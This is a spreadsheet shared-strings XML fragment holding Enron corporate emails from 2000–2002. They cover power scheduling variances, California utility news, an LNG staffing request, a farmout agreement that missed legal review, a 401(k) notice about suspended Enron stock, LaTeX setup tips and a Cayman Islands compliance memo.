    <t>RE: Crestone Imbalance</t>
  </si>
  <si>
    <t>Gloria,_x000D_
Amy Felling here is working on current month and I'll continue on prior month variances.  We'll let you know the status of current month by tomorrow afternoon._x000D_
_x000D_
Thanks,_x000D_
Theresa_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Barkowsky, Gloria G.  _x000D_
Sent:	Wednesday, October 24, 2001 11:56 AM_x000D_
To:	Staab, Theresa_x000D_
Subject:	Crestone Imbalance_x000D_
_x000D_
 &lt;&lt; File: Crestone.xls &gt;&gt; _x000D_
_x000D_
Theresa - here's the latest by month of the imbalance.  Please let me know if_x000D_
there is any way that I can help you.  Could I look at current month, while you_x000D_
look at the past stuff?  Please let me know.  Thanks, Gloria</t>
  </si>
  <si>
    <t>Fri, 22 Sep 2000 08:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Calif. allows SDG&amp;E to strike bilateral power deals.</t>
  </si>
  <si>
    <t>USA: Calif. allows SDG&amp;E to strike bilateral power deals._x000D_
  _x000D_
09/21/2000 _x000D_
Reuters English News Service _x000D_
(C) Reuters Limited 2000. _x000D_
SAN FRANCISCO, Sept 21 (Reuters) - California regulators on Thursday approved _x000D_
an order allowing utility San Diego Gas and Electric to buy power through _x000D_
bilateral contracts. _x000D_
The utility had previously been mandated to buy all its power through the _x000D_
Pasadena-based California Power Exchange. _x000D_
The contracts can be for up to five years and must expire by December 31, _x000D_
2005. The amount of power that can be bought is limited but a CPUC spokesman _x000D_
could not immediately confirm details of the restriction. _x000D_
Last month, the California Public Utilities Commission allowed the state's _x000D_
other two investor owned utilities, Rosemead-based Southern California Edison _x000D_
and San Francisco-based Pacific Gas and Electric to buy power on bilateral _x000D_
contracts under similar terms. _x000D_
Wholesale electricity prices have risen to record levels this year, resulting _x000D_
in sharply higher power bills for SDG&amp;E customers, who were the first in the _x000D_
nation to pay market-based prices without a safety net. _x000D_
The price spike for customers was exacerbated by a lack of hedging by SDG&amp;E. _x000D_
The CPUC's move to allow bilateral contracts is seen as part of an attempt to _x000D_
encourage more hedging. _x000D_
San Diego Gas and Electric is a unit of Sempra Energy , Southern California _x000D_
Edison a subsidiary of Edison International and Pacific Gas and Electric a _x000D_
unit of PG&amp;E Corp .</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 04:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'egert_steve@emc.com'})</t>
  </si>
  <si>
    <t>frozenset({'drew_fossum@enron.com'})</t>
  </si>
  <si>
    <t>FW: More on the Florida ballot</t>
  </si>
  <si>
    <t>More on the ballot.  Hopefully the internet satellite link is working on the_x000D_
corp. jet._x000D_
_x000D_
_x000D_
_x000D_
 - protest5.jpg_x000D_
 - protest4.jpg_x000D_
 - protest2.jpg</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 09:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Help on DPC LNG Options</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
I fully support Sandeep's request to move Anshuman Srivastav to Houston._x000D_
I anticipate that we shall be working on Dhabol related issues for the next _x000D_
two years_x000D_
until all the business problems are successfully resolved._x000D_
_x000D_
Anshuman is a very capable employee, with the right combination of skills to_x000D_
attack the Dhabol modeling challenge. He understands the Indian markets as _x000D_
well_x000D_
as international fuel markets. He has also a very good grasp_x000D_
of power industry fundamentals and of the technology used at the Dhabol power _x000D_
plant._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/12/2001 _x000D_
04:54 PM ---------------------------_x000D_
_x000D_
_x000D_
Sandeep Kohli@ENRON_DEVELOPMENT_x000D_
03/12/2001 12:40 PM_x000D_
To: Vince J Kaminski@ECT_x000D_
cc:  _x000D_
Subject: Help on DPC LNG Options_x000D_
_x000D_
Vince,_x000D_
_x000D_
This is a follow-up of our meeting with Jeff Shankman on Friday, as well as _x000D_
our discussions with the Global Assets Group on DPC issues._x000D_
_x000D_
As you see, there is a need for developing a comprehensive fuel strategy for _x000D_
DPC that encompasses both the LNG phase, and the naphtha side.  Furthermore, _x000D_
any fuel strategy we develop will have to be in consonance with the power _x000D_
side of the business.  There is a lot of analytical work that will be _x000D_
required in this context over the next several months, and we will need a _x000D_
person who understands both the power and the fuel side of the business at _x000D_
DPC._x000D_
_x000D_
I believe Anshuman is just such a person.  He has worked closely with me over _x000D_
the last 2 yrs., and has been trained in the derivatives side of the business _x000D_
(he has attended all three levels of Derivatives classes offered at Enron).  _x000D_
Over the last month, his presence in Houston has greatly helped me in melding _x000D_
the Henwood study with the picture on the LNG/fuel side.  I believe his _x000D_
presence in Houston will be critical to us developing a comprehensive _x000D_
fuel/LNG strategy for Dabhol, together with the Global Markets and Asset  _x000D_
groups._x000D_
_x000D_
I am therefore requesting you to explore the possibility of Anshuman being _x000D_
moved on a more permanent basis to Houston.  As you are aware, Anshuman _x000D_
himself would welcome such an arrangement._x000D_
_x000D_
Regards,_x000D_
Sandeep._x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jan 2000 02:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'inja.chun@enron.com'})</t>
  </si>
  <si>
    <t>Unify use of TIBCO in Production</t>
  </si>
  <si>
    <t>Sally,_x000D_
As you know, we have been working to find new ways to improve Unify Logistics _x000D_
functions.  A major step has now been achieved by installing TIBCO and moving _x000D_
it into production today.  _x000D_
_x000D_
 Utilizing TIBCO in conjunction with our other enhancements will enable _x000D_
Logistics to obtain real time updates from both EOL and Sitara without having _x000D_
to re-retrieve them from the database.  This will automatically update _x000D_
Scheduler screens with new deals as it comes without action on their part and _x000D_
also reduce required database access.  This has been achieved through great _x000D_
team work between many groups including Logistics Schedulers, Unify IT _x000D_
Logistics &amp; ADE, UNIX and Network people.    Please let me know if you want _x000D_
to know more details.   Thank you.</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 23:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Signature page for Assisgnment of Option</t>
  </si>
  <si>
    <t xml:space="preserve">Please email the signature version of both documents._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
j.nassos@pecorp.com on 06/08/2000 06:50:27 PM_x000D_
To: Kay.Mann@enron.com_x000D_
cc: j.burns@pecorp.com, gregory_spitzer@chicago.kirkland.com, _x000D_
dtauke@winston.com, vhedge@winston.com _x000D_
_x000D_
Subject: Signature page for Assisgnment of Option_x000D_
_x000D_
_x000D_
Kay -_x000D_
_x000D_
Attached is the signature page for the Assignment of Option Agreement.  Per_x000D_
West LB's request, please print out six copies and have each one signed._x000D_
When the text of the Assignment is finalized tomorrow morning and acceptable_x000D_
to Enron, please fax one signed copy back to me at (312) 240-4486.  Please_x000D_
Federal Express all six originals to me also.  We will send back counterpart_x000D_
signatures from all parties for your files when completed._x000D_
_x000D_
If you have any questions, don't hesitate to call (312-240-4413).  Thanks_x000D_
for your help on this matter._x000D_
_x000D_
 &lt;&lt;Assignment of Option Sig Page.doc&gt;&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_x000D_
reliance upon, this information by persons or entities other than the_x000D_
intended recipient is prohibited.   If you received this in error, please_x000D_
contact the sender and delete the material from any computer._x000D_
_x000D_
 - Assignment of Option Sig Page.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 18:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/11/01; HourAhead hour: 2;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/11/01; HourAhead hour: 2;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
Variances detected in Energy Import/Export schedule._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041102.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 2 / Preferred:  33.87 / Final:  20.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: TOSCO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  UNIT_ID: UNCHEM_1_UNIT_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 2 / Preferred:  41.40 / Final:  41.37)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: DELANO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  UNIT_ID: PANDOL_6_UNIT_x000D_
_x000D_
_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 2 / Preferred:  47.00 / Final:  46.99)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstSW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: MEAD_2_WALC_x000D_
  INTERCHG_ID: EPMI_CISO_8000_x000D_
  ENGY_TYPE: WHEEL_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 2 / Preferred:   8.00 / Final:   7.99)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_BUNNY_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 2 / Preferred:   0.43 / Final:   0.29)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 2 / Preferred:   4.69 / Final:   3.32)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE2_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 2 / Preferred:  42.88 / Final:  30.55)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 14:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: APS Losses</t>
  </si>
  <si>
    <t xml:space="preserve">Jesse, this has been done.  I called APS to confirm that they show this _x000D_
however they said they were to busy and they would call me back.  As of this _x000D_
email they have not yet called me back.  They seemed a  little perturbed that _x000D_
I was calling about 1 MW. </t>
  </si>
  <si>
    <t>Sun, 12 Nov 2000 09:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cypress Exploration Program--Operator/Cash Call Issue</t>
  </si>
  <si>
    <t xml:space="preserve">Mark:_x000D_
_x000D_
I spoke briefly to Steve Pruett this past week regarding the Cypress JOA cash _x000D_
call issue that you had inquired about.   As I mentioned in my voicemail to _x000D_
you, I was not aware of the farmout arrangement or JOA with Kelley and had _x000D_
not been asked to review the farmout agreement or the JOA.  I obtained copies _x000D_
of the documents and asked Steve to fill me in on how the situation _x000D_
developed.  Steve was out of the office much of last week; he followed up _x000D_
Friday with the attached email message. _x000D_
_x000D_
As Steve mentions in his email, there were extenuating circumstances and _x000D_
timing issues, but certainly it was a mistake for a rig to be moved and a _x000D_
well spudded without agreements in place and for documents to be signed _x000D_
without appropriate review and approval.  I understand that John Thompson and _x000D_
Steve made the decision to move the rig and spud the well when they had a _x000D_
term sheet and draft agreement that they anticipated being able to sign in _x000D_
short order.   Allen Wilhite and I frequently work together to get _x000D_
documentation finalized and in form for Steve's execution.  From Steve's _x000D_
reaction when I told him I had not reviewed or initialled the farmout (which _x000D_
had been initialled by Allen), I believe he had assumed that had been the _x000D_
case in this situation as well, although he did not try to place _x000D_
responsibility on Allen._x000D_
_x000D_
Steve is one of the best and the brightest I've worked with at Enron.  He is _x000D_
extremely busy, working very hard to manage the portfolio of existing E &amp; P _x000D_
assets, as well as working on new deals.  I have worked with Steve enough to _x000D_
know that he would never have intentionally failed to follow our procedures.  _x000D_
I think this incident was a mistake that will not be repeated.  I will remind _x000D_
the ECR group at Monday's staff meeting that review by the legal department _x000D_
is required before any agreements are signed._x000D_
_x000D_
Where do we go from here?  Would you like for me to arrange a meeting with _x000D_
Steve?  Please let me know if there is anything further you would like for me _x000D_
to do. _x000D_
_x000D_
Steve raises the issue of staffing in his email.  In light of the level of _x000D_
activity for new ECR deals, time that is required in assisting Global Finance _x000D_
with Condor and a funding vehicle for the VPPs, and the increased legal time _x000D_
required as Bonne Terre, Cypress, and Vastar are no longer managed by third _x000D_
parties, being able to provide quality and timely legal advice is _x000D_
increasingly difficult, and staffing is an issue that I hope can be addressed _x000D_
soon.      _x000D_
_x000D_
Teresa      _x000D_
_x000D_
_x000D_
_x000D_
Teresa G. Bushman_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3835A_x000D_
Houston, TX  77002_x000D_
(713) 853-7895_x000D_
fax (713) 646-3393_x000D_
teresa.g.bushman@enron.com_x000D_
_x000D_
_x000D_
----- Forwarded by Teresa G Bushman/HOU/ECT on 11/10/2000 06:04 PM -----_x000D_
_x000D_
	Steve Pruett@ENRON_x000D_
	11/09/2000 07:18 PM_x000D_
		 _x000D_
		 To: teresa.g.bushman@enron.com_x000D_
		 cc: _x000D_
		 Subject: Kelly Farmout Agreement - Cypress Venture_x000D_
_x000D_
Teresa:_x000D_
_x000D_
Thank you for approaching me directly about the issue of my failure to obtain _x000D_
legal review of the subject farmout agreement in Enron Energy Capital _x000D_
Resources' (ECR) Cypress Venture.  The circumstances of the event follow to _x000D_
the best of my knowledge, without confirming with Allen Wilhite who is _x000D_
presently inaccessible:_x000D_
_x000D_
Rozel Energy, led by Bill Rogers, identified a high potential / relatively _x000D_
low risk prospect in late August on acreage held by Kelley Oil &amp; Gas (sub of _x000D_
Contour Energy).  He commissioned a lease check and found that Kelley _x000D_
controlled 90%+ of the acreage, but it was set to expire on Sept. 28, 2000._x000D_
_x000D_
Rozel, after reviewing the prospect with ECR technical personnel and _x000D_
receiving approval to do so, sought to acquire top leases over the prospect _x000D_
only to find that others had already top-leased a significant portion of the _x000D_
prospect.  Had the Kelley lease expired, these parties would have controlled _x000D_
and drilled the prospect._x000D_
_x000D_
Rozel, with the help of Allen Wilhite, approached Kelley for a farmout.  _x000D_
Kelley asked to be presented with a prospect review under the concept that _x000D_
Kelley would be willing to farmout approximately 50% of its interest, or _x000D_
farmout all of its interest retaining an ORRI convertible to a WI APO or _x000D_
higher ORRI at its option._x000D_
_x000D_
Kelley elected to participate for 50% of its interest in the well before the _x000D_
farmout agreement was drafted.  Kelley agreed to general terms in a brief _x000D_
letter agreement.  Kelley sought to operate the well, which ECR rejected due _x000D_
to Kelley's poor track record in drilling deep S. Louisiana wells.  Rozel _x000D_
Energy is the operator in absence of Enron having an operating vehicle.  _x000D_
Rozel employed a seasoned contract operator in S. Louisiana, Stokes and _x000D_
Speiler, who are being managed daily by Arvel Martin and Bob Devine, who each _x000D_
have over 25 years experience in mangement of drilling operations._x000D_
_x000D_
Inasmuch as the operation of the well was in dispute, the negotiation of the _x000D_
JOA and the farmout agreement was strained and Kelley was non-responsive to _x000D_
Allen's efforts to finalize the agreement.  Allen, Craig Fox, Arvel Martin _x000D_
and I met with Kelley's Land Manager and VP of Operations and established a _x000D_
dialogue and rapport (we thought).  The initial draft of the farmout _x000D_
agreement was put together on Sept. 15th by Kelley and Allen.  Allen did not _x000D_
share the draft with you then as we were still apart on certain deal _x000D_
provisions, particularly who would operate.  ECR members were in dispute over _x000D_
the importance of operations._x000D_
_x000D_
With Kelley's consent and our high level of confidence that we would reach _x000D_
terms with Kelley, we moved our rig in and spudded the well a few days prior _x000D_
to the Sept. 28th lease expiration.  Allen and I continued to be frustrated _x000D_
with not reaching final contract terms with Kelley after the well was _x000D_
spudded.  I pressed Allen to finalize an agreement and he presented an _x000D_
agreement signed by Kelley on October 16, 2000 (effective Sept. 15, 2000).   _x000D_
Following my signature and upon his departure to Kelley's offices to deliver _x000D_
the document, I asked him if you had reviewed JOA and he said no.  I asked _x000D_
him if it was required or customary for Legal to review JOAs, and he said it _x000D_
was sometimes done but there are rarely revisions.  I did not ask _x000D_
specifically about farmout agreements.  The Kelley farmout was the first _x000D_
farmout in a directly-owned asset that I had encountered.  I failed to _x000D_
recognize the distinction between numerous farmouts that I had seen executed _x000D_
by our GP's in our Juniper, Bonne Terre (historically) and Texland ventures, _x000D_
and a farmout with Enron's name on the line._x000D_
_x000D_
It is my job as a Vice President to know what requires Legal review.  I have _x000D_
been made aware that farmout agreements and JOA's in directly owned assets _x000D_
(as opposed to LP's with a GP such as Juniper) require Legal review and _x000D_
signoff.  The compliance meeting last week underscored that point.  We had _x000D_
outside counsel (Lisa Jaubert) under your direction review the Tri-C and _x000D_
Manti farmout agreements and your initials are evidence of your approval. _x000D_
_x000D_
I respect you as an attorney and business partner and commit that I will be _x000D_
diligent about obtaining your review of agreements and ask you when in doubt _x000D_
as to whether legal review and approval is required on a particular item or _x000D_
issue._x000D_
_x000D_
The demands that our large oil &amp; gas exploration portfolio places on you is _x000D_
another issue that we should discuss.  The Bonne Terre, Cypress and Vastar _x000D_
ventures have significant drilling activity that has commenced and will _x000D_
continue.  Dissolution of Bonne Terre and distribution of the assets to ENA _x000D_
(to be held in BT Exploration LLC) will increase the legal and commercial _x000D_
activity level.  We have another prospect in Cypress that is being promoted _x000D_
and will be spudded in the next 10 days, so expect to see a farmout agreement _x000D_
on the S. Riceville prospect late next week._x000D_
_x000D_
I would be pleased to discuss these matters with you and Mark Haedicke in _x000D_
person if you desire.  I regret my failure to obtain your review and approval _x000D_
of the Kelley farmout agreement and commit to preventing a repeat of the _x000D_
mistake.  I am concerned about the pace of agreements that we face in the _x000D_
immediate future on our direct-owned ventures.   I look forward to working _x000D_
with you on ways to better manage our business process in Cypress-Acadian, _x000D_
Bonne Terre &amp; Vastar ventures. </t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 12:51:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dl-ga-all_domestic@enron.com'})</t>
  </si>
  <si>
    <t>IMPORTANT MESSAGE TO ALL EMPLOYEES PARTICIPATING IN THE ENRON CORP_x000D_
 SAVINGS &amp; ESOP PLANS</t>
  </si>
  <si>
    <t>_x000D_
PLEASE READ THIS IMPORTANT INFORMATION CONCERNING THE ENRON STOCK FUND IN THE ENRON CORP. SAVINGS AND ESOP PLANS_x000D_
_x000D_
On Friday, January 11, trading of Enron stock was suspended on the New York Stock Exchange (NYSE).  All Savings and ESOP Plan transactions, including 401(k) payroll contributions,  involving this fund were placed in a pending status until trading resumed._x000D_
_x000D_
As announced by Enron's Office of the Chair on Wednesday, January 16, Enron stock would now be traded Over The Counter (OTC).  Upon receiving this information, work began immediately to develop a process that allows for OTC trades in the plans._x000D_
_x000D_
On Thursday, January 17, Enron initiated a process to facilitate OTC trades of Enron stock inside the 401(k) and ESOP and all pending transactions were processed using Thursday's closing price.  _x000D_
_x000D_
Now that trading has resumed, we urge you to review your investment elections to ensure that they are consistent with your investment goals.  _x000D_
_x000D_
As things change, we will continue to update you._x000D_
_x000D_
Enron Benefits Department</t>
  </si>
  <si>
    <t>Sun, 8 Apr 2001 13:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Free Latex</t>
  </si>
  <si>
    <t xml:space="preserve">Return-Path: &lt;Alex.Huang@enron.com&gt;_x000D_
Received: from  rly-yc05.mx.aol.com (rly-yc05.mail.aol.com [172.18.149.37]) _x000D_
by air-yc05.mail.aol.com (v77_r1.36) with ESMTP; Fri, 06 Apr 2001 17:37:46 _x000D_
-0500_x000D_
Received: from  postmaster.enron.com (outbound5.enron.com [192.152.140.9]) by _x000D_
rly-yc05.mx.aol.com (v77_r1.36) with ESMTP; Fri, 06 Apr 2001 17:37:26 -0400_x000D_
Received: from mailman.enron.com (mailman.enron.com [192.168.189.66]) by _x000D_
postmaster.enron.com (8.8.8/8.8.8/postmaster-1.00) with ESMTP id VAA28666 for _x000D_
&lt;vkaminski@aol.com&gt;; Fri, 6 Apr 2001 21:37:26 GMT_x000D_
From: Alex.Huang@enron.com_x000D_
Received: from nahou-msmsw02px.corp.enron.com ([172.28.10.38]) by _x000D_
mailman.enron.com (8.10.1/8.10.1/corp-1.05) with ESMTP id f36LbPL03926 for _x000D_
&lt;vkaminski@aol.com&gt;; Fri, 6 Apr 2001 16:37:25 -0500 (CDT)_x000D_
Received: from ene-mta01.enron.com (unverified) by _x000D_
nahou-msmsw02px.corp.enron.com (Content Technologies SMTPRS 4.1.5) with ESMTP _x000D_
id &lt;Tac1c0a265a52c0dd4737@nahou-msmsw02px.corp.enron.com&gt; for _x000D_
&lt;vkaminski@aol.com&gt;; Fri, 6 Apr 2001 16:37:25 -0500_x000D_
Subject: Free Latex_x000D_
To: Vince.J.Kaminski@enron.com, Tom.Halliburton@enron.com_x000D_
Cc: vkaminski@aol.com_x000D_
Date: Fri, 6 Apr 2001 16:37:22 -0500_x000D_
Message-ID: &lt;OFBFC248F1.2F0D9C57-ON86256A26.00744A8B@enron.com&gt;_x000D_
X-MIMETrack: Serialize by Router on ENE-MTA01/Enron(Release 5.0.6 |December _x000D_
14, 2000) at 04/06/2001 04:33:32 PM_x000D_
MIME-Version: 1.0_x000D_
Content-type: text/plain; charset="us-ascii"_x000D_
X-Mailer: Unknown (No Version)_x000D_
_x000D_
_x000D_
Go to http://www.winedt.com/, select downloads, and download  WinEdt5 to_x000D_
your C drive._x000D_
On bottom of  the same page (download),  click on MiKTeX's Home Page,_x000D_
click on MiKTeX 2.0, and download all the highlighted zip files.  You may_x000D_
also_x000D_
want to download miktex-2.0-manual.pdf._x000D_
You can then unzip all the files and follow the steps outlined in_x000D_
miktex-2.0-manual.pdf to_x000D_
install WinEdt and MiKTex.  However, the procedure to "Add MikTex bin_x000D_
directory to PATH"_x000D_
may not work. It's best to manually add the following to your path:_x000D_
C:\texmf\miktex\bin;_x000D_
_x000D_
This software is quite easy to use and very versatile. You can even include_x000D_
colored picture in your tex document._x000D_
_x000D_
Best,_x000D_
Alex_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 05:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Meeting Monday, December 4th - Bonus Deferral Choices</t>
  </si>
  <si>
    <t>If you are interested in learning more about the bonus deferral choices or _x000D_
have specific questions regarding the deferral plan, please join us in the _x000D_
Video Conference room on Monday, 12/4 from 10:00 am - 11:00 am or from 2:00 _x000D_
pm - 3:00 pm.   We will be video conferencing with our Compensation team in _x000D_
Houston to  provide an overview of the deferral choices as well as answer _x000D_
your questions._x000D_
_x000D_
Please let Teri Whitcomb know if you will be attending as space is limited._x000D_
_x000D_
Thanks!_x000D_
Amy</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 13:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eSource Presents Free SDC Platinum Training</t>
  </si>
  <si>
    <t>eSource presents SDC Platinum training_x000D_
_x000D_
SDC Platinum offers detailed transactional information on New Issues, Mergers _x000D_
&amp; Acquisitions, Syndicated Loans, Private Equity, Strategic Alliances, _x000D_
Project Finance and others.  The product is designed to allow users to _x000D_
compare transactions, evaluate advisors, and analyze market and industry _x000D_
trends._x000D_
_x000D_
Training Agenda Includes:_x000D_
? General Introduction._x000D_
? Basic query techniques for new issues and M&amp;A databases._x000D_
? Basic query techniques for trend analysis._x000D_
_x000D_
Attend our SDC Platinum Clinic: _x000D_
    _x000D_
May 30     9:00 -11:30 AM   EB552_x000D_
_x000D_
_x000D_
Seats fill up fast! To reserve a seat, please call Stephanie E. Taylor at _x000D_
5-7928_x000D_
Check the eSource training page at http://esource.enron.com/training.doc for _x000D_
additional training sessions and vendor presentations._x000D_
_x000D_
http://esource.enron.com</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 02:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'linda.noske@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jenny.helton@enron.com', 'mark.taylor@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'jan.king@enron.com', 'james.grace@enron.com', 'janette.elbertson@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'lance.schuler-legal@enron.com', 'becky.tlucek@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'chaundra.woods@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'mark.haedicke@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'samantha.ferguson@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'jeffrey.hodge@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'peter.vecchio@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'joya.davis@enron.com', 'travis.mccullough@enron.com', 'karen.jones@enron.com', 'brenda.whitehead@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'dale.rasmussen@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com'})</t>
  </si>
  <si>
    <t>Huntlaw Corporate Services Limited -  COMPLIANCE PROCEDURES FOR_x000D_
 CAYMAN ISLANDS COMPANIES</t>
  </si>
  <si>
    <t>FYI - Please see attached information from Kate Cole. _x000D_
_x000D_
Deb Korkmas_x000D_
Enron North America Corp._x000D_
ENA Legal Dept._x000D_
1400 Smith Street, Room 3819_x000D_
Houston, TX  77002_x000D_
Phone:  713-853-5448_x000D_
Fax:  713-646-3393_x000D_
----- Forwarded by Deb Korkmas/HOU/ECT on 10/13/2000 09:27 AM -----_x000D_
_x000D_
	Kate Cole@ENRON_x000D_
	10/13/2000 09:05 AM_x000D_
		 _x000D_
		 To: Melanie Curran/EWC/Enron@ENRON, Sue Kelly/LON/ECT@ECT, Robin Hill/Enron _x000D_
Communications@Enron Communications, Deb Korkmas/HOU/ECT@ECT, Mary _x000D_
Ogden/HOU/ECT@ECT, Lori Pinder/HOU/EES@EES, Annette Patrick/LON/ECT@ECT, _x000D_
Bonnie_Rushing@pgn.com, Ed B Hearn III/HOU/ECT@ECT, Julie _x000D_
Delahay/EWC/Enron@ENRON, Barbara Hankins/HOU/AZURIX@AZURIX, Lorna _x000D_
Jones/LON/ECT@ECT, Michael Slade/LON/ECT@ECT, David Bateman/Corp/Enron@ENRON_x000D_
		 cc: Hardie Davis/Corp/Enron@ENRON, Teresa Callahan/Corp/Enron@Enron_x000D_
		 Subject: Huntlaw Corporate Services Limited -  COMPLIANCE PROCEDURES FOR _x000D_
CAYMAN ISLANDS COMPANIES_x000D_
_x000D_
I'm attaching a memorandum from Hunter &amp; Hunter, our Cayman Islands counsel, _x000D_
regarding recent changes in Cayman Islands laws and regulations.  Please _x000D_
forward it to other interested parties in your departments._x000D_
_x000D_
One immediate consequence of these changes is the request by counsel that we _x000D_
provide them with more detail on the intended business activities of our new _x000D_
subsidiaries in the A&amp;J memos that are sent to them.  Without being _x000D_
impractical, something more than "Oil &amp; Gas exploration in Mexico" (by way of _x000D_
example) is requested.  If it is impossible to provide more meaningful detail _x000D_
without going on extensively, then the current practice will have to continue _x000D_
to be acceptable.  However, a business purpose of "holding company" is _x000D_
probably not going to be acceptable._x000D_
_x000D_
If you have specific questions or concerns after reviewing the memorandum, I _x000D_
suggest that you contact Rory Todd or another representative of Hunter &amp; _x000D_
Hunter (phone:  345-949-4900; fax:  345-949-5175; email rtodd@huntlaw.com.ky)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks guys!  Kate_x000D_
_x000D_
Kate B. Cole_x000D_
Director, Corporate Services_x000D_
Enron Corp._x000D_
Tel: (713) 853-1624_x000D_
FAX: (713) 646-8007_x000D_
Email: kate.cole@enron.com</t>
  </si>
